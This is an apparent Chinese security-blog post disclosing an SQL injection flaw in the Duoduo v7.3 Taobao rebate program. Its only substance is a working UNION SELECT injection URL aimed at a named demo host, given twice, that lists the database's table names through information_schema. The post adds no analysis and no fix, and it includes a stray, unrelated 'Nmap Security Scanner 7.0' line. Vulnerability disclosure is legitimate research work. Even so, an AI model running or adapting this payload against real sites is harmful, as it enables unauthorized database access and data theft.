当前位置: iick's blog > 网站漏洞 > 多多返利淘宝客程序Duoduo v7.3注入漏洞

多多返利淘宝客程序Duoduo v7.3注入漏洞

作者:hack1990 时间:12-01-31 阅读数:606人阅读
简要描述:
 
http://demo.duoduo123.com/huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29 可以注入。
 
详细说明:
 
http://demo.duoduo123.com/huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29

# Nmap Security Scanner 7.0

上一篇:记事狗微博3.0 0day

下一篇:PHP安全之XSS攻击

相关文章

发表评论